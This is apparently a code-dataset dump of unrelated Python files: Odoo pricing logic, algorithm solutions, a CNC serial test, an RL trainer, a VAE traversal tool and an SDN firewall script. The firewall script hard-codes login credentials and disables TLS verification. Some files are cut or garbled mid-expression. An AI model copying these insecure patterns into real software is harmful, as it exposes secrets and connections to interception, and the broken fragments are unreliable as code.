ResCurrencyRate.search([('currency_id', '=', 3)], limit=1, order=\"name desc\")\n if tipo_de_cambio:\n tipo_de_cambio = tipo_de_cambio[0].rate2\n else:\n tipo_de_cambio = 1.00\n\n extra_price *= tipo_de_cambio\n\n return(extra_price)\n\n def _get_volume_prices_per_sale_line(self, order_id, product_id, product_uom, product_uom_qty, price_unit):\n if not (product_id and order_id.partner_id\n and order_id.pricelist_id):\n return('', '')\n\n # Si la lista de precios tiene un sólo \"Item\" entonces para extraer\n # las cantidades ir a la lista de precios base del \"Item\"\n if len(order_id.pricelist_id.item_ids) == 1:\n if order_id.pricelist_id.item_ids[0].base == 'list_price':\n search_pricelist_id = order_id.pricelist_id.item_ids[0].base_pricelist_id\n else:\n search_pricelist_id = order_id.pricelist_id.id\n else:\n search_pricelist_id = order_id.pricelist_id.id\n\n # Falta buscar por Variante\n ProductPriceListItem = self.env['product.pricelist.item']\n price_list = ProductPriceListItem.search(\n [('pricelist_id', '=', search_pricelist_id),\n ('product_tmpl_id', '=', product_id.product_tmpl_id.id)], order=\"min_quantity DESC\")\n\n context_partner = dict(self.env.context, partner_id=order_id.partner_id.id, date=order_id.date_order)\n pricelist_context = dict(context_partner, uom=product_uom.id)\n\n extra_price = self.GetExtraPriceVariantProduct(product_id, order_id.pricelist_id.currency_id)\n\n str_prices = ''\n str_mininimum_quantity = ''\n unit_price = \"\"\n for price in price_list:\n if price.id and price.min_quantity:\n # Marco: Usa esta función para extraer la precio de la tarifa pública de la siguiente manera:\n # Comando para debuggear:\n # sudo su - odoo9dev -c \"/opt/odoo9dev/odoo/openerp-server --config /etc/odoo9dev/odoo.conf --dev\"\n # tarifa_publica = self.env['res.lang'].search([('name', '=', 'Nombre de la tarifa publica')])\n # context_partner = dict(self.env.context, 
partner_id=order_id.partner_id.id, date=order_id.date_order)\n # pricelist_context = dict(context_partner, uom=product_uom.id)\n # tarifa_publica..with_context(pricelist_context).get_product_price_rule(product_id, price.min_quantity, order_id.partner_id)\n unit_price, rule_id = order_id.pricelist_id.with_context(pricelist_context).get_product_price_rule(product_id, price.min_quantity, order_id.partner_id)\n str_prices += self._formatLang(unit_price + extra_price, show_currency=False) + \"\\n\"\n str_mininimum_quantity += '{:0,.0f}'.format(price.min_quantity) + \"\\n\"\n\n # En caso de que el producto no se encuentre en la lista de precio, calcular el precio\n if unit_price == \"\":\n product = product_id.with_context(\n lang=order_id.partner_id.lang,\n partner=order_id.partner_id.id,\n quantity=product_uom_qty,\n date=order_id.date_order,\n pricelist=order_id.pricelist_id.id,\n uom=product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position')\n )\n unit_price, rule_id = order_id.pricelist_id.with_context(pricelist_context).get_product_price_rule(product_id, product_uom_qty, order_id.partner_id)\n price_unit = unit_price\n\n if str_prices == \"\" or str_mininimum_quantity == \"\":\n str_prices = self._formatLang(price_unit + extra_price, show_currency=False)\n str_mininimum_quantity = '{:0,.0f}'.format(product_uom_qty)\n\n return(str_mininimum_quantity, str_prices)\n\n\n @api.onchange('product_id')\n def _get_volume_prices(self):\n for sale_order_line in self:\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(sale_order_line.order_id, sale_order_line.product_id, self.product_uom, self.product_uom_qty, self.price_unit)\n\n sale_order_line.dnk_minimum_quantity = dnk_minimum_quantity\n sale_order_line.dnk_volume_prices = dnk_volume_prices\n\n\n @api.onchange('product_uom', 'product_uom_qty')\n def product_uom_change(self):\n if not self.product_uom or not self.product_id:\n self.price_unit = 0.0\n return\n if self.order_id.pricelist_id and self.order_id.partner_id:\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position')\n )\n self.price_unit = self.env['account.tax']._fix_tax_included_price_company(self._get_display_price(product), product.taxes_id, self.tax_id, self.company_id)\n extra_price = self.GetExtraPriceVariantProduct(self.product_id, self.order_id.pricelist_id.currency_id)\n self.price_unit += extra_price\n","sub_path":"denker/dnk_sale_volume_quotation/models/sale_order_line.py","file_name":"sale_order_line.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"449909915","text":"class Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n\n def dfs(nums, last_num):\n\n if len(nums) == k:\n res.append(nums)\n\n for i in range(last_num + 1, n + 1):\n dfs(nums + [i], i)\n\n if not n or not k:\n return []\n res = []\n\n for i in range(1, n + 1):\n dfs([i], i)\n return res","sub_path":"77. Combinations.py","file_name":"77. 
Combinations.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"147130698","text":"from serial import Serial\nfrom serial.tools.list_ports_posix import comports\nimport time\ndebug = True\n\n## https://www.staticboards.es/blog/dominar-motor-paso-a-paso-con-grbl/\n## https://www.youtube.com/watch?v=KXyS63nO_rU \ndef get_port_name():\n ''' Displays information to terminal to led the user select the comport (Arduino USB connection)'''\n cps = comports()\n print('Printing devices available.')\n if len(cps)==0:\n print('Error: Seems empty ...')\n print('Exiting...')\n exit()\n for cp, i in enumerate(cps):\n print(str(i)+')',cp)\n print('Select the device.\\n>',end='')\n us = input()\n device = 0\n if us !='':\n try:\n device=int(us)\n except:\n print('Not a number, selecting ', device,cps[device].device )\n return cps[device].device\n\n\ndef send_command(ser,cmd):\n ''' Sends info to the Arduino and waits 1ms to response.\n Returns response.'''\n ser.write((cmd+'\\n').encode())\n if debug:print('TO ->',cmd.replace('\\r\\n','\\r\\n\\t\\t'))\n time.sleep(0.01)\n response_u = b''.join(ser.readlines())\n response = response_u.decode() \n if debug and response != '\\r\\n' :print('FROM <-',response.replace('\\r\\n','\\r\\n\\t\\t'))\n return(response)\n\n\ndef velocitytest(ser):\n send_command(ser,'$112=100')\n send_command(ser,'g01 z0')\n for i in range(1,4):\n print('To zero position')\n ## first slowly\n print('To 10 position')\n send_command(ser,'g00 z.5 f'+str(i)) \n time.sleep(2)\n send_command(ser,'g00 z-.5 f'+str(2*i))\n time.sleep(2)\n send_command(ser,'$112='+str(100+25*i))\n send_command(ser,'g01 z0')\n\nif __name__ == \"__main__\":\n print('Starting system...')\n motor = get_port_name()\n print()\n print('Motor at ',motor)\n ser = Serial(motor,115200,timeout=0) # serial connection to arduino GRBL\n print('Starting connection to', motor)\n time.sleep(2)\n print(send_command(ser,'?'))\n #send_command(ser,'$112=50')\n velocitytest(ser) \n\n","sub_path":"testing_m.py","file_name":"testing_m.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"277399476","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 16 14:16:35 2020\n\n@author: hmenet\n\"\"\"\n\n###############################################\n#local search for three levels reconciliations\n#events rates\n#both or only one reconciliation rates\n###############################################\n\nimport random as rd\nimport numpy as np\n\nfrom three_levels_rec_heuristics import gene_3_level_rec\n\ndef from_2_rates_vect_to_1(rates_hp, rates_g):\n rates=dict()\n rates[\"Thp\"] = rates_hp[\"T\"]\n rates[\"Dhp\"] = rates_hp[\"D\"]\n rates[\"Lhp\"] = rates_hp[\"L\"]\n rates[\"Tg\"] = rates_g[\"T\"]\n rates[\"Dg\"] = rates_g[\"D\"]\n rates[\"Lg\"] = rates_g[\"L\"]\n return rates\n\ndef from_1_rates_vect_to_2(rates):\n rates_g=dict()\n rates_hp=dict()\n rates_hp[\"T\"] = rates[\"Thp\"]\n rates_hp[\"D\"] = rates[\"Dhp\"]\n rates_hp[\"L\"] = rates[\"Lhp\"]\n rates_g[\"T\"] = rates[\"Tg\"]\n rates_g[\"D\"] = rates[\"Dg\"]\n rates_g[\"L\"] = rates[\"Lg\"]\n return rates_hp, rates_g\n\n \n#only_gene : modify only gene upper reconciliation rates\n#only upper : modify only parasite host reconciliation rates\n#move_proba : if new likelihood is less than the current, we move if x best_likelihood:\n if first_step :\n 
first_step=False\n best_likelihood=new_likelihood\n best_rates=new_rates.copy()\n move=True\n else:\n x=rd.random()\n #because likelihood is negative\n if x 1.0:\n return False\n\n\n return True\n\n\ndef industry_earnings_test(ticker):\n pass\n\n\ndef days_to_cover_test(ticker):\n \"\"\"Give Days to Cover a passing score if the number of days is less than 2 days.\"\"\"\n\n days_to_cover = pull_days_to_cover(ticker)\n if float(days_to_cover) >= 2:\n return False\n\n return True\n\n\ndef insider_trading_test(ticker):\n \"\"\"Give Insider Trading a passing score if the net activity for the past 3 months has been positive\"\"\"\n\n net_activity = pull_recent_net_insider_trading(ticker)\n\n if '(' in net_activity:\n return False\n\n return True\n\n\ndef weighted_alpha_test(ticker):\n pass\n","sub_path":"dev/nasdaq_dozen_test.py","file_name":"nasdaq_dozen_test.py","file_ext":"py","file_size_in_byte":10599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"30719476","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^mycv/$', views.Myc2vView.as_view(), name='myc2v'),\n url(r'^myc2v/connexion$', views.Myc2vLoginView, name='myc2v_login'),\n url(r'^myc2v/theme$', views.theme, name='myc2v-theme'),\n url(r'^myc2v/webcam$', views.webcam, name='youtube'), \n url(r'^myc2v/download$', views.download, name='download'), \n url(r'^myc2v/audio$', views.audio, name='audio'), \n url(r'^myc2v/upload_audio$', views.upload_audio, name='upload_audio'), \n url(r'^cv/(?P\\d+)-(?P[-\\w\\d]+)$$', views.C2vView, name='c2v_view'),\n url(r'^cv/linkedin$', views.ManualImportLinkedin, name='manual-import'),\n]","sub_path":"c2v/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"424761696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 18 16:40:05 2019\n\n@author: Harold\n\"\"\"\n\n#Known Forces \nP = 37.9*10**3 #F_act2 [N]\nq = 2.71*10**3 #Aerodynamic load [N/m]\n\n#Known Variables\nC_a = 0.484 #chord length [m]\nl_a = 1.691 #span aileron [m]\nx_1 = 0.149 #location hinge 1 [m]\nx_2 = 0.554 #location hinge 2 [m]\nx_3 = 1.541 #location hinge 3 [m]\nx_a = 0.272 #distance between act 1 and 2 [m]\nh = 0.173 #aileron height [m]\nt_sk = 1.1*10**-3 #skin thickness [m]\nt_sp = 2.5*10**-3 #spar thickness [m]\nt_st = 1.2*10**-3 #stiffener thickness [m]\nh_st = 1.4*10**-2 #height stiffener [m]\nw_st = 1.8*10**-2 #width stiffener [m]\nn_st = 13 #number of stiffeners [-]\nd_1 = 0.681*10**-2 #vert displ hinge 1 [m]\nd_3 = 2.03*10**-2 #vert displ hinge 3 [m]\ntheta = 26. 
#max upwards deflect [deg]\r\n\r\n#Material and Structural Properties\r\nE = 73.1*10**9 #E-modulus [Pa]\r\nG = 28.*10**9 #Shear Modulus [Pa]\r\ntau_ult = 283.*10**6 #Shear Strength [Pa]\r\n\r\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"14243862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys, getopt, csv, json, uuid, datetime\nimport requests, random, string\n\n# Suppress InsecureRequestWarning in urllib3\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n## Define variables\ncontroller_ip = '192.168.83.211'\nauth = json.loads('{\"login\":{\"user\":\"sdn\",\"password\":\"skyline\",\"domain\":\"sdn\"}}')\nauth_path = 'https://' + controller_ip + ':8443/sdn/v2.0/auth'\napi_path = 'https://' + controller_ip + ':8443/sdn/fw/v1.0/firewall'\nheaders = {'content-type': 'application/json'}\n\n## Manage authentication\nresponse = requests.post(auth_path, data=json.dumps(auth), headers=headers, verify=False)\ndata = response.json()\ntoken = data[u'record'][u'token']\ntimestamp = data[u'record'][u'expiration'] / 1000\ntoken_expiration = datetime.datetime.fromtimestamp(timestamp)\nheaders['X-Auth-Token'] = token\n\n\ndef main():\n parameters = arguments(sys.argv[1:])\n add_rules_to_ACL(parameters)\n\n\ndef arguments(argv):\n '''\n Parse commandline arguments\n '''\n try:\n opts, args = getopt.getopt(argv, \"h\", [\"help\", \"amount=\"])\n except getopt.GetoptError as e:\n print(\"\\n\")\n print(str(e))\n usage()\n sys.exit(2)\n amount = 1000\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt == \"--amount\":\n amount = arg\n else:\n usage()\n sys.exit()\n return amount\n\ndef add_rules_to_ACL(amount):\n '''\n Add randomly generated rules to the ACL\n '''\n rules = []\n for i in range(int(amount)):\n rule = {}\n rule['id'] = str(uuid.uuid4())\n rule['name'] = randomName(10)\n rule['src'] = None\n rule['srcPort'] = randomNumber(49151)\n rule['srcMask'] = None\n rule['dst'] = str(randomNumber(255)) + '.' + str(randomNumber(255)) + '.' + str(randomNumber(255)) + '.' 
+ str(randomNumber(255))\n rule['dstPort'] = randomNumber(49151)\n rule['dstMask'] = None\n rule['protocol'] = \"ANY\"\n rule['action'] = \"BLOCK\"\n rule['appId'] = None\n rule['bidirectional'] = True\n rule['vlanId'] = None\n rule['disabled'] = False\n rule['scheduledInitialDate'] = None\n rule['scheduledFinalDate'] = None\n rules.append(rule)\n print(json.dumps(rules, indent=4))\n\n for item in rules:\n response = requests.post(api_path, data=json.dumps(item), headers=headers, verify=False)\n\ndef randomName(length):\n return ''.join(random.choice(string.ascii_lowercase) for i in range(length))\n\ndef randomNumber(limit):\n return random.randint(1, limit)\n\ndef usage():\n '''\n Print usage info\n '''\n print(\n '''\n USAGE:\n\n --help Display this help\n --amount CSV file containing all the rules\n ''')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CyberTrust/Protector_ACL_and_Blacklist/add_ACL_test.py","file_name":"add_ACL_test.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"621344849","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport copy\r\nimport numpy as np\r\nimport datetime\r\nimport tensorflow as tf\r\nfrom Env import Documents\r\nfrom dataset import Dataset\r\nfrom utils.io_utils import base_args\r\nfrom approachs.dqn_model import MontCarloModel\r\nfrom approachs.lp_model import Evaluator\r\nfrom utils.io_utils import write_args \r\n\r\n\r\ndef parse_args():\r\n parser = base_args()\r\n parser.add_argument('--algo', default='MontCarlo', type=str, help='algorithm name')\r\n parser.add_argument('--epochs', default=6, type=int, help='epochs of each iteration.')\r\n parser.add_argument('--batch_size', default=128, type=int, help='batch size')\r\n parser.add_argument('--rep_num', default=1, type=int, help='samples repeat number')\r\n parser.add_argument('--learning_rate', default=1e-5, type=float, help='learning rate')\r\n parser.add_argument('--gamma', default=1.0, type=float, help='discount rate')\r\n parser.add_argument('--c_entropy', default=0.001, type=float, help='entropy coefficient in loss')\r\n parser.add_argument('--update_steps', default=4, type=int, help='train times every batch')\r\n parser.add_argument('--decay_steps', default=3000, type=int, help='learning rate decay steps')\r\n parser.add_argument('--decay_rate', default=1.0, type=float, help='learning rate decay rate')\r\n parser.add_argument('--timestamp', type=str, default=datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\r\n parser.add_argument('--evaluator_path', type=str, default='model_eval', help='evaluator ckpt dir')\r\n FLAGS, _ = parser.parse_known_args()\r\n return FLAGS\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = parse_args()\r\n print(args)\r\n write_args(args, './model_params.txt')\r\n # dataset\r\n doc = Documents(num_total=args.num_documents, \r\n num_feature=args.feature_size, \r\n num_visible=args.feature_size_vis, \r\n seed=100)\r\n train_set = Dataset(doc, 'train')\r\n val_set = Dataset(doc, 'validation')\r\n model_path = os.path.join(args.checkpointDir, args.algo, args.timestamp)\r\n model = MontCarloModel(args, model_path, args.algo)\r\n evaluator = Evaluator(model_path=os.path.join(os.path.dirname(os.path.realpath(__file__)), args.evaluator_path))\r\n with model.model_graph.as_default() as g: \r\n sess = tf.Session(graph=g)\r\n 
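# --- Illustrative sketch (not from the original record): re-authenticating
# against the controller before the token_expiration computed above runs out.
# The one-minute safety margin is an assumption.
def ensure_token():
    global token, token_expiration
    if datetime.datetime.now() >= token_expiration - datetime.timedelta(minutes=1):
        resp = requests.post(auth_path, data=json.dumps(auth),
                             headers={'content-type': 'application/json'}, verify=False)
        record = resp.json()[u'record']
        token = record[u'token']
        token_expiration = datetime.datetime.fromtimestamp(record[u'expiration'] / 1000)
        headers['X-Auth-Token'] = token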
model.set_sess(sess)\r\n\r\n path1, path2 = os.path.join(model_path, 'train'), os.path.join(model_path, 'test')\r\n if not os.path.isdir(path1):\r\n os.makedirs(path1)\r\n if not os.path.isdir(path2):\r\n os.makedirs(path2)\r\n train_writer = tf.summary.FileWriter(path1, g)\r\n test_writer = tf.summary.FileWriter(path2, g)\r\n \r\n sess.run(tf.global_variables_initializer())\r\n model.load_model()\r\n\r\n metrics_name = ['total_loss', 'returns', 'gauc', 'ndcg']\r\n c_entropy = args.c_entropy\r\n for e in range(args.epochs):\r\n print('Epoch: %d' % (e))\r\n while True:\r\n try:\r\n x_data_id, x_data, y = train_set.read(args.batch_size)\r\n # tile\r\n shape1 = x_data_id.shape\r\n x_data_id = np.tile(x_data_id, (1, args.rep_num)).reshape((-1, shape1[1]))\r\n shape2 = x_data.shape\r\n x_data = np.tile(x_data, (1, args.rep_num, 1)).reshape((-1, shape2[1], shape2[2]))\r\n shape3 = y.shape\r\n y = np.tile(y, (1, args.rep_num)).reshape((-1, shape3[1])) \r\n \r\n act_idx_out, q_pred_one, rl_outputs, mask_arr, _, _, gauc, ndcg, summary1 = model.predict(x_data, y)\r\n rewards = evaluator.predict(rl_outputs).reshape((-1, args.slate_size))\r\n \r\n for _ in range(args.update_steps):\r\n total_loss, mean_return, summary2, step = \\\r\n model.train(x_data, rl_outputs, q_pred_one, act_idx_out, rewards, mask_arr, c_entropy)\r\n\r\n if step % (10 * int(args.update_steps)) == 0:\r\n print('step: %d'%(step), ', '.join([name+': '+str(value) for name, value in zip(metrics_name, [total_loss, mean_return, gauc, ndcg])]))\r\n train_writer.add_summary(summary1, step)\r\n train_writer.add_summary(summary2, step)\r\n\r\n # validation\r\n if step % (100 * int(args.update_steps)) == 0:\r\n # validation set\r\n metrics_value = [[] for _ in range(len(metrics_name[1:]))]\r\n\r\n while True:\r\n try:\r\n x_data_id_e, x_data_e, y_e = val_set.read(1000)\r\n act_idx_out, act_probs_one, rl_outputs, mask_arr, _, _, gauc, ndcg, _ = model.predict(x_data_e, y_e)\r\n rewards = evaluator.predict(rl_outputs).reshape((-1, args.slate_size))\r\n\r\n _, mean_return = model.get_long_reward(rewards)\r\n for v, vl in zip([mean_return, gauc, ndcg], metrics_value):\r\n vl.append(v)\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n model.save_model()\r\n summary_val = tf.Summary(value=[tf.Summary.Value(tag=\"summary/\"+name, simple_value=np.mean(val)) \r\n for name, val in zip(metrics_name[1:], metrics_value)])\r\n test_writer.add_summary(summary_val, step)\r\n print('Validation:', ', '.join([name+': '+str(np.mean(val)) for name, val in zip(metrics_name[1:], metrics_value)]))\r\n except Exception as e:\r\n print(e)\r\n break\r\n print('Done.')\r\n","sub_path":"MonteCarlo_train.py","file_name":"MonteCarlo_train.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201643906","text":"import numpy as np\nimport tensorflow as tf\nfrom disentangle.general import Timer, loading_bar\nimport cv2\nimport os\nimport imageio\nimport shutil\nclass Traversal:\n\t\n\tdef __init__(self, model, inputs):\n\t\t\"\"\"Traversal of the latent space class give one model and one set of inputs\n\t\t\n\t\tExamples:\n\t\t\t>>> def image_traversal(model, inputs, latent_of_focus=3, min_value=0, max_value=3, num_steps=15, is_visualizable=True)\n\t\t\t>>> \ttraverse = Traversal(model, inputs)\n\t\t\t>>> \ttraverse.traverse_latent_space(latent_of_focus=3, min_value=0, max_value=3, num_steps=15)\n\t\t\t>>> \ttraverse.create_samples()\n\t\t\t>>> \tif not 
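# --- Illustrative sketch (not from the original record): the discounted return
# a Monte Carlo style trainer like the one above typically needs. Treating
# model.get_long_reward() as computing G_t = sum_k gamma^k * r_{t+k} is an
# assumption, not something stated in the source.
import numpy as np

def discounted_returns(rewards, gamma=1.0):
    '''rewards: (batch, T) array of per-step rewards; returns per-step G_t.'''
    returns = np.zeros_like(rewards, dtype=np.float64)
    running = np.zeros(rewards.shape[0])
    for t in range(rewards.shape[1] - 1, -1, -1):
        running = rewards[:, t] + gamma * running
        returns[:, t] = running
    return returns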
is_visualizable:\n\t\t\t>>> \t\treturn traverse.samples\n\t\t\t>>> \treturn traverse.construct_single_image()\n\n\n\t\tArgs:\n\t\t model (Tensorflow Keras Model): Tensorflow VAE from utils.tf_custom\n\t\t inputs (numpy arr): Input images in NHWC\n\t\t latent_of_focus (int): Latent element to traverse, arbitraly set to 0 as default\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\tReturns:\n\t\t Numpy arr: image\n\t\t\"\"\"\n\t\tself.model = model\n\t\tself.orig_inputs = inputs\n\t\tself.inputs = inputs\n\t\tself.samples = None\n\t\tself.latent_rep_trav = None #latent traversal to become shape [num traversal, N, num latents]\n\n\t@property\n\tdef num_latents(self):\n\t\treturn self.model.num_latents\n\n\tdef traverse_complete_latent_space(self, min_value=-3, max_value=3, num_steps=30):\n\t\t\"\"\"Will travers all the latent space. \n\t\tThe num images and num latents dimensions will be flattened to one dimension\n\t\tshape of latents will be: [num images, num latents]\n\t\t\n\t\tArgs:\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\t\"\"\"\n\t\tlatent_reps = []\n\t\tinputs = None\n\t\t\n\t\t# accumulate images for all the different latent representations, for all images\n\t\tfor i in range(self.num_latents):\n\t\t\tself.traverse_latent_space(latent_of_focus=i, \n\t\t\t\tmin_value=min_value, max_value=max_value, num_steps=num_steps)\n\t\t\tlatent_reps.append(self.latent_rep_trav.copy())\n\t\t\t\n\t\t\tif inputs is None:\n\t\t\t\tinputs = np.empty((self.num_latents, *self.inputs.shape))\n\t\t\tinputs[i] = self.inputs\n\n\t\t# latents\n\t\tlatent_reps = np.asarray(latent_reps)\n\t\tlatent_reps = np.transpose(latent_reps, (2,0,1,3)) \n\t\tself.latent_rep_trav = latent_reps.reshape((-1, *latent_reps.shape[-2:])).transpose((1,0,2))\n\t\t# self.latent_rep_trav is flattened from [num_images, num_latents]\n\n\n\n\t\t# inputs duplication\n\t\tinputs = np.transpose(inputs, (1,0,2,3,4))\n\t\tinputs = np.reshape(inputs, (-1, *inputs.shape[-3:]))\n\t\tself.inputs = inputs\n\n\tdef encode(self, inputs):\n\t\treturn self.model.encoder(inputs)\n\n\tdef decode(self, samples):\n\t\treturn self.model.decoder(samples)\n\n\tdef traverse_latent_space(self, latent_of_focus=3, min_value=-3, max_value=3, num_steps=30, add_min_max=False):\n\t\t\"\"\"traverses the latent space, focuses on one latent for each given image.\n\t\t\n\t\tArgs:\n\t\t latent_of_focus (int): Latent element to traverse, arbitraly set to 0 as default\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\t\"\"\"\n\t\tt = Timer()\n\t\t# initialize latent representation of images\n\t\t_, latent_rep, latent_logvar = self.encode(self.inputs)\n\t\tlatent_rep = latent_rep.numpy()\n\t\tstddev = np.sqrt(np.exp(latent_logvar.numpy()[:,latent_of_focus]))\n\n\t\t# create latent traversal\n\t\tlatent_rep_trav = []\n\t\tfor i in np.linspace(min_value, max_value, num_steps):\n\t\t\tmod_latent_rep = latent_rep.copy()\n\t\t\taddition = np.zeros(mod_latent_rep.shape)\n\t\t\taddition[:,latent_of_focus] = i\n\t\t\tmod_latent_rep=latent_rep\n\t\t\tif not 
add_min_max:\n\t\t\t\tmod_latent_rep[:,latent_of_focus]=0\n\t\t\tmod_latent_rep+=addition\n\t\t\tlatent_rep_trav.append(mod_latent_rep.copy())\n\n\n\t\tself.latent_rep_trav = np.asarray(latent_rep_trav)\n\t\tself.inputs = self.orig_inputs\n\n\n\tdef create_samples(self, batch_size=16):\n\t\t\"\"\"Creates the sample from the latent representation traversal\n\t\t\"\"\"\n\t\tassert not self.latent_rep_trav is None, \"Please call traverse_latent_space first to get latent elements for self.latent_rep_trav\"\n\n\t\t# flattened latent traversal for one batch dimension (assuming that the latent traversal is of the size, [num traversal, N, num latents])\n\t\tlatent_rep = np.vstack(self.latent_rep_trav)\n\n\t\t# get the samples\n\t\tgenerated = None\n\t\tfor i in range(np.ceil(latent_rep.shape[0]/batch_size).astype(int)):\n\t\t\tgen = self.decode(latent_rep[i*batch_size:(i+1)*batch_size]).numpy()\n\t\t\tif generated is None:\n\t\t\t\tgenerated = np.empty((latent_rep.shape[0],*gen.shape[1:]))\n\t\t\tgenerated[i*batch_size:(i+1)*batch_size] = gen\n\t\t# reshape back to [num traversal, N, W, H, C], as per self.latent_rep_trav\n\t\tself.samples = tf.reshape(generated, (*self.latent_rep_trav.shape[:2],*generated.shape[1:])).numpy()\n\t\n\tdef construct_single_image(self):\n\t\t\"\"\"Construct a single image to be displayed from samples. samples should be of shape [num traversal, N, W, H, C]\n\t\t\n\t\tReturns:\n\t\t numpy array: array of images\n\t\t\"\"\"\n\t\tassert not self.samples is None, \"Please call create_samples first to get sample to reconstruct\"\n\n\t\tsamples = np.concatenate(self.samples,-2) # concatenate horizontally\n\t\tsamples = np.concatenate(samples,-3) # concatenate vertically\n\t\treal = np.concatenate(self.inputs,-3)\n\n\t\timage = np.concatenate((real, samples),-2) #concatenate the real and reconstructed images\n\t\timage = image[:,:,:3]\n\t\treturn image\n\t@property\n\tdef samples_list(self):\n\t\tinputs = np.broadcast_to(self.inputs, self.samples.shape)\n\t\treturn [inputs, self.samples]\n\n\tdef save_gif(self, gif_path, latent_num=None):\n\t\t\"\"\"Save traversal as a gif\n\t\t\n\t\tArgs:\n\t\t gif_path (str): the destination of the gif. Must end with .gif\n\t\t latent_num (int, optional): the latent number to animate. 
If this is None, will animate entire latent space \n\t\t\"\"\"\n\t\t# vertically stack all sample list\n\t\t# include inputs\n\t\t\n\t\tsamples = np.concatenate(self.samples_list, -3)\n\n\t\t# horizontally stack images\n\t\tsamples = samples.transpose(1,0,2,3,4)\n\t\tif latent_num is None:\n\t\t\tsamples = np.concatenate(samples, axis=-2)\t\n\t\telse:\n\t\t\tsamples = samples.reshape(-1, self.num_latents, *samples.shape[1:])\n\t\t\tsamples = np.concatenate(samples[:,latent_num], axis=-2)\n\n\t\tcreate_gif(samples, gif_path)\n\ndef create_gif(arr, gif_path):\n\t\"\"\"Creates samples from a NHWC data array and saves it into gif_path.\n\tarr must be a float between 0 and 1\n\t\n\tArgs:\n\t arr (nparray): gif array\n\t gif_path (str): path to save gif (must end with .gif)\n\t\"\"\"\n\ttmp_dir = os.path.splitext(gif_path)[0]+\"_tmp_gif\"\n\tif os.path.exists(tmp_dir):\n\t\t# remove previous exising temp\n\t\tshutil.rmtree(tmp_dir)\n\tos.mkdir(tmp_dir)\n\tframes_path = os.path.join(tmp_dir,\"{i}.jpg\")\n\tarr = np.concatenate((arr, np.flip(arr, axis=0)), 0)\n\n\n\tnum_images = len(arr)\n\tfor i, x in enumerate(arr):\n\t\trgb_img = (x[:,:,:3]*255).astype(np.uint8)\n\n\t\tcv2.imwrite(frames_path.format(i=i), cv2.cvtColor(rgb_img, cv2.COLOR_RGB2BGR), [int(cv2.IMWRITE_JPEG_QUALITY),100])\n\t\tprint(\"Creating Gif Frames: \", loading_bar(i+1, len(arr)), end=\"\\r\")\n\t\n\twith imageio.get_writer(gif_path, mode='I') as writer:\n\t\tfor i in range(num_images):\n\t\t\twriter.append_data(imageio.imread(frames_path.format(i=i)))\n\t\t\tprint(\"Stitching Gif Frames: \", loading_bar(i+1, len(arr)), end=\"\\r\")\n\tshutil.rmtree(tmp_dir)\n\tprint(\"\\nCreated gif: %s\"%gif_path)\n","sub_path":"src/disentangle/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"191835961","text":"#User function Template for python3\r\nfrom bisect import bisect_left\r\n \r\n# Function to find LIS in O(nlogn) time\r\ndef LongestIncreasingSubsequenceLength(v):\r\n if len(v) == 0:\r\n return 0\r\n \r\n tail = [0 for i in range(len(v) + 1)]\r\n length = 1\r\n \r\n tail[0] = v[0]\r\n \r\n for i in range(1, len(v)):\r\n if v[i] > tail[length-1]:\r\n tail[length] = v[i]\r\n length += 1\r\n \r\n else:\r\n tail[bisect_left(tail, v[i], 0, length-1)] = v[i]\r\n \r\n return length\r\n\r\nclass Solution:\r\n def minInsAndDel(self, arr, brr, N, M):\r\n # Find LCS using 